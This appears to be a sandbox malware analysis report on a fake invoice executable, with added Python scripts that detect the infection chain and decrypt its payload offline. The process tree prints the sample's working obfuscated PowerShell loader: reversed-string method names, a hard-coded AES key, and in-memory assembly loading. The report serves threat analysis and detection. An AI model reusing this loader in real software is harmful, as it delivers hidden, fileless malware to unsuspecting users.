Analysis
max time kernel: 1156s
max time network: 1237s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 09-02-2023 14:59
Static task
static1
Behavioral task
behavioral1
Sample
Invoice due.one.exe
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
Invoice due.one.exe
Resource
win7-20221111-en
Behavioral task
behavioral3
Sample
Invoice due.one.exe
Resource
win10v2004-20220901-en
General
Target: Invoice due.one.exe
Size: 153KB
MD5: 6de66d63e7e9a414313c0237cbe97e78
SHA1: 464b5449e668281565e3378c72063431be99c15f
SHA256: c4faab169180f07a3621c37d42aa79d04825b2a2ecc2ba01b3db7d1a8950c8b6
SHA512: cc2ecad9bcee75e79c812564afadee4bfe3445b72818d13ff92b732326e222699b3d803728742a0ddc64adc7405eae3d365abb6371f62a921589ab82075930c0
SSDEEP: 3072:f0FHdppuOf+wMSHjnywM0vY9t8Qkh+n8KMmkYX3HB8ox1wm/:cFPMOf+wMAywM0EJksnJvNHh8Sn/
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes:
  pid 284  Attached file.bat.exe
- Loads dropped DLL (1 IoC)
  Processes:
  pid 552  cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
  pid 284  Attached file.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
  Token: SeDebugPrivilege  pid 284  Attached file.bat.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (source pid -> target pid):
  PID 1152 (Invoice due.one.exe) wrote to memory of 552 (cmd.exe), recorded 4 times
  PID 552 (cmd.exe) wrote to memory of 284 (Attached file.bat.exe), recorded 4 times
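The three PIDs above form one chain: the sample spawns cmd.exe, which runs a batch file out of a 7zS*.tmp directory (the staging directory a 7-Zip SFX stub extracts into), and that batch launches "Attached file.bat.exe" with PowerShell's own switches. The following is an added example, not sandbox output, of the process-creation triage logic an analyst would run over such events. The EVENTS list is constructed from the process tree on this page plus one benign control; field names follow the Sysmon Event ID 1 layout, and the control's script path is an assumption.

```python
"""Process-creation triage for the chain the sandbox logged (Invoice due.one.exe
-> cmd.exe -> 'Attached file.bat.exe' with PowerShell switches). Added example,
not sandbox output. EVENTS are CONSTRUCTED from the report's process tree plus
one benign control; field names follow Sysmon Event ID 1 but are assumptions."""
import re
from pathlib import PureWindowsPath

PS_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}
# Switches only a PowerShell host parses (-ep is -ExecutionPolicy).
PS_SWITCH = re.compile(
    r"(?i)(?:^|\s)-(?:noprofile|nop|nologo|noninteractive|windowstyle|"
    r"executionpolicy|ep|command|encodedcommand|enc)\b"
)
# %TEMP%\7zS<hex>.tmp\ is the staging directory a 7-Zip SFX stub extracts into.
SFX_DIR = re.compile(r"(?i)\\temp\\7zs[0-9a-f]+\.tmp\\")
# Lure-style names: a document/script extension followed by .exe.
DOUBLE_EXT = re.compile(r"(?i)\.(?:one|bat|cmd|pdf|doc|docx|xls|xlsx|txt)\.exe$")
# cmd.exe /c running a .bat from somewhere under the user's Temp tree.
CMD_BAT_TEMP = re.compile(r'(?i)/c\s+"*[a-z]:\\users\\[^"]*\\appdata\\local\\temp\\[^"]*\.bat\b')


def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def triage(ev: dict) -> list:
    """Return the names of every rule the event trips (empty list = clean)."""
    hits = []
    name, cmd = image_name(ev["Image"]), ev["CommandLine"]
    # 1. PowerShell switches on an image that is not a known PowerShell host:
    #    the signature of a copied/renamed powershell.exe.
    if name not in PS_HOSTS and len({m.strip().lower() for m in PS_SWITCH.findall(cmd)}) >= 2:
        hits.append("powershell_switches_non_ps_host")
    # 2. Image living in, or command line referencing, a 7-Zip SFX temp dir.
    if SFX_DIR.search(ev["Image"]) or SFX_DIR.search(cmd):
        hits.append("sfx_staging_dir")
    # 3. Double extension on the image itself (Invoice due.one.exe, Attached file.bat.exe).
    if DOUBLE_EXT.search(name):
        hits.append("double_extension_exe")
    # 4. cmd.exe executing a batch file from the user's Temp tree.
    if name == "cmd.exe" and CMD_BAT_TEMP.search(cmd):
        hits.append("cmd_runs_bat_from_user_temp")
    return hits


def triage_all(events: list) -> dict:
    return {ev["ProcessId"]: triage(ev) for ev in events}


def chain(events: list, pid: int) -> list:
    """Walk ParentProcessId links up from pid; oldest known ancestor first."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    path, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        path.append(pid)
        pid = by_pid[pid]["ParentProcessId"]
    return path[::-1]


EVENTS = [  # constructed from the report's process tree; not sandbox output
    {"ProcessId": 1152, "ParentProcessId": 1000,
     "Image": r"C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe",
     "CommandLine": r'"C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe"'},
    {"ProcessId": 552, "ParentProcessId": 1152,
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat" "'},
    {"ProcessId": 284, "ParentProcessId": 552,
     "Image": r"C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exe",
     # body of the -command argument truncated; the full text is in the process tree
     "CommandLine": r'"Attached file.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ttXwr = [System.IO.File]::(...)'},
    {"ProcessId": 4000, "ParentProcessId": 1000,  # benign control (assumed path)
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for pid, hits in triage_all(EVENTS).items():
        print(pid, " > ".join(map(str, chain(EVENTS, pid))), hits)
```

Rule 2 on its own is low fidelity (legitimate 7-Zip SFX installers extract into the same 7zS*.tmp pattern) and the control event shows that `-ExecutionPolicy Bypass` on a real powershell.exe is not flagged; the strong signal is rule 1 together with rule 2 or 3 on the same process, which is exactly PID 284's profile.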
Processes
1. C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe (pid 1152)
   command line: "C:\Users\Admin\AppData\Local\Temp\Invoice due.one.exe"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe (pid 552, child of 1)
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat" "
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      3. C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exe (pid 284, child of 2)
         command line:
         "Attached file.bat.exe" -noprofile -windowstyle hidden -ep bypass -command
         $ttXwr = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat').Split([Environment]::NewLine);
         foreach ($IwcZR in $ttXwr) { if ($IwcZR.StartsWith(':: ')) { $jwYjz = $IwcZR.Substring(3); break; }; };
         $DRyrf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jwYjz);
         $jeXlp = New-Object System.Security.Cryptography.AesManaged;
         $jeXlp.Mode = [System.Security.Cryptography.CipherMode]::CBC;
         $jeXlp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;
         $jeXlp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CedaivH7c2Og4h7rOIX15KINYZFZWQdVk+kZhiAR7Dg=');
         $jeXlp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ND6uaRHwvfNQY4EWCZjXCg==');
         $GxqNz = $jeXlp.CreateDecryptor();
         $DRyrf = $GxqNz.TransformFinalBlock($DRyrf, 0, $DRyrf.Length);
         $GxqNz.Dispose();
         $jeXlp.Dispose();
         $fIBwg = New-Object System.IO.MemoryStream(, $DRyrf);
         $MaiTM = New-Object System.IO.MemoryStream;
         $DTruH = New-Object System.IO.Compression.GZipStream($fIBwg, [IO.Compression.CompressionMode]::Decompress);
         $DTruH.CopyTo($MaiTM);
         $DTruH.Dispose();
         $fIBwg.Dispose();
         $MaiTM.Dispose();
         $DRyrf = $MaiTM.ToArray();
         $WLnCz = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DRyrf);
         $vfzgA = $WLnCz.EntryPoint;
         $vfzgA.Invoke($null, (, [string[]] ('')))
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
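The command line of process 3 is the whole loader. Its switches (-noprofile -windowstyle hidden -ep bypass -command) are PowerShell's, so "Attached file.bat.exe" is a PowerShell host started under a disguised name (an inference from the command line; the report itself does not identify the 442KB binary). Method names are hidden by writing each string literal backwards and indexing it with [-1..-N] ('txeTllAdaeR' is ReadAllText, 'gnirtS46esaBmorF' is FromBase64String, 'daoL' is Load). The script reads the 49KB "Attached file.bat", takes the first line beginning with ":: " (a batch comment, so cmd.exe ignores it), base64-decodes it, decrypts it with AES-CBC/PKCS7 under the hard-coded 32-byte key and 16-byte IV, gunzips the result, and hands the bytes to Assembly.Load() before invoking the entry point, so the payload never touches disk. The following is an added example, not the sample's code and not sandbox output: an offline Python decoder that runs the same pipeline but writes the assembly out instead of executing it. KEY_B64 and IV_B64 are copied from the command line above; the carrier used by demo_roundtrip() is constructed, since the real .bat is not on the page; the AES stage needs the optional `cryptography` package.

```python
"""Offline recovery of the payload staged by the PowerShell loader in the
process tree above. Added example; not the sandbox's output and not the
sample's own code. KEY_B64 / IV_B64 are verbatim from the logged command line;
the carrier .bat used by demo_roundtrip() is CONSTRUCTED because the real
'Attached file.bat' is not on the page. AES-CBC needs the optional
'cryptography' package; everything else is standard library."""
import base64
import gzip
import re

KEY_B64 = "CedaivH7c2Og4h7rOIX15KINYZFZWQdVk+kZhiAR7Dg="
IV_B64 = "ND6uaRHwvfNQY4EWCZjXCg=="

# 'txeTllAdaeR'[-1..-11] -join ''  -> PowerShell reads the literal backwards.
REVERSED = re.compile(r"'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''")


def deobfuscate(cmd: str) -> str:
    """Rewrite every reversed-literal trick into the plain method name.
    [-1..-N] yields s[-1], s[-2], ..., s[-N]; in this loader N always equals
    the literal's length, and the [:n] slice keeps the same meaning otherwise."""
    return REVERSED.sub(lambda m: "'" + m.group(1)[::-1][: int(m.group(2))] + "'", cmd)


def carrier_payload(bat_text: str) -> bytes:
    """The first ':: ' comment line of the .bat holds the base64 ciphertext
    (same selection as the loader: StartsWith(':: ') then Substring(3))."""
    for line in bat_text.splitlines():
        if line.startswith(":: "):
            return base64.b64decode(line[3:])
    raise ValueError("no ':: ' carrier line in .bat")


def aes_params(key_b64: str = KEY_B64, iv_b64: str = IV_B64) -> tuple:
    """Decode and sanity-check the hard-coded key/IV (32-byte key => AES-256)."""
    key, iv = base64.b64decode(key_b64), base64.b64decode(iv_b64)
    if len(key) not in (16, 24, 32) or len(iv) != 16:
        raise ValueError(f"bad AES parameters: key={len(key)} iv={len(iv)}")
    return key, iv


def unpack(ciphertext: bytes, key: bytes, iv: bytes) -> bytes:
    """AES-CBC/PKCS7 decrypt then gunzip, mirroring the loader; nothing is executed."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return gzip.decompress(unpad.update(padded) + unpad.finalize())


def looks_like_pe(blob: bytes) -> bool:
    """Assembly.Load() expects a managed PE; no MZ header means wrong key/IV or carrier."""
    return blob[:2] == b"MZ"


def build_demo_carrier(payload: bytes, key: bytes, iv: bytes) -> str:
    """Forward direction (gzip -> AES-CBC -> base64 -> ':: ' line). Only used to
    fabricate a test carrier; the real .bat's remaining lines are unknown."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    pad = padding.PKCS7(128).padder()
    padded = pad.update(gzip.compress(payload)) + pad.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    blob = enc.update(padded) + enc.finalize()
    return ":: " + base64.b64encode(blob).decode() + "\r\n@echo off\r\n"


# Constructed stand-in for the assembly: an MZ header plus filler, nothing more.
DEMO_PAYLOAD = b"MZ" + b"\x00" * 62 + b"constructed stand-in, not the real assembly"


def demo_roundtrip():
    """Round-trip DEMO_PAYLOAD through the pipeline; None if 'cryptography' is absent."""
    try:
        import cryptography  # noqa: F401
    except ImportError:
        return None
    key, iv = aes_params()
    return unpack(carrier_payload(build_demo_carrier(DEMO_PAYLOAD, key, iv)), key, iv)


if __name__ == "__main__":
    import sys
    key, iv = aes_params()
    if len(sys.argv) > 1:  # python decode.py "Attached file.bat" [payload.bin]
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            out = unpack(carrier_payload(fh.read()), key, iv)
        print("MZ header:", looks_like_pe(out), "bytes:", len(out))
        with open(sys.argv[2] if len(sys.argv) > 2 else "payload.bin", "wb") as fh:
            fh.write(out)
    else:
        print(demo_roundtrip() == DEMO_PAYLOAD)
```

Run it against the dropped "Attached file.bat" (MD5 28083371df55e64f12c86dccc6f69f55) to get the .NET assembly the loader would have executed in memory; if looks_like_pe() is false, the carrier line or the key/IV was not what this command line used. The deobfuscate() step is also what you would apply to the raw command line before writing a detection on method names, since the reversed literals defeat a naive "FromBase64String" string match.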
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat
  Filesize: 49KB
  MD5: 28083371df55e64f12c86dccc6f69f55
  SHA1: 2cc63c7389063aab8fb19609f8a21e038c783eab
  SHA256: 1d2b7d4335fdf27119f1db76fb7685d75dacfc0427c300f83bcbbabeb8622529
  SHA512: d11fe0d09aada3b069125a075cb9da249c1b30fd4489c912c1563aeff8b846c1e0f2f11cd18c81888d3e731f2331abd4ce2d5d1e4de79246ae3a8004be7a98a3
- C:\Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exe (listed three times in the report with identical hashes, once under the drive-less path \Users\Admin\AppData\Local\Temp\7zSD06A.tmp\Attached file.bat.exe)
  Filesize: 442KB
  MD5: 92f44e405db16ac55d97e3bfe3b132fa
  SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
  SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
  SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
- memory/284-58-0x0000000000000000-mapping.dmp
- memory/284-61-0x00000000748A0000-0x0000000074E4B000-memory.dmp
  Filesize: 5.7MB
- memory/284-62-0x00000000748A0000-0x0000000074E4B000-memory.dmp
  Filesize: 5.7MB
- memory/552-55-0x0000000000000000-mapping.dmp
- memory/1152-54-0x0000000076581000-0x0000000076583000-memory.dmp
  Filesize: 8KB